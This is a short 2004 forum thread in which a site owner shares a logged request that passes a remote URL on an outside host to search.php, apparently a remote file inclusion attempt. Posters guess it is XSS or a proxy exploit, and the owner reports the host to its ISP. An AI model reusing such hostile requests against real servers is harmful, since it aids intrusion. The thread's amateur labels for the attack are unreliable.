Is This a XSS Attempt?

**vinyl-junkie** · Aug 10, 2004 19:19

I noticed an interesting entry in my server log today, thankfully a 404:

Code:

/search.php=http://hux0x.topcities.com/cmd1.txt

I checked out the URL, and it looks like someone is being a very bad boy.

I assume this is an example of a cross-site scripting attempt? Is it possible they would have gotten anywhere with this script if I had register globals turned on? Do you think it would do any good to report this activity to this person's ISP?

**Cam** · Aug 10, 2004 19:25

This is probably better suited to the security forum.

Yeah for sure report them to their ISP!

**maxor** · Aug 10, 2004 22:19

BWAHAHA

This part was very funny to me...

Linux Local Kernel Exploit copiado com sucesso

Stupid script kiddies

**Jackal05** · Aug 10, 2004 22:24

It looks as if the person is trying to find a exploit to use search.php as a proxy.

**vinyl-junkie** · Aug 24, 2004 21:16

Just a follow-up on this thread. I filed an abuse report with this person's ISP a few weeks ago. I checked on their site just now, and a page comes up that says the site is temporarily unavailable, either because they don't have an index.html page (which they are required to have for a free account), or they have been suspended because they are over their bandwidth limit.

Personally, I don't care what the reason is, just so long as they're shut down.

User Tag List

Thread: Is This a XSS Attempt?

Thread Tools

Display

Is This a XSS Attempt?

Bookmarks

Bookmarks

Posting Permissions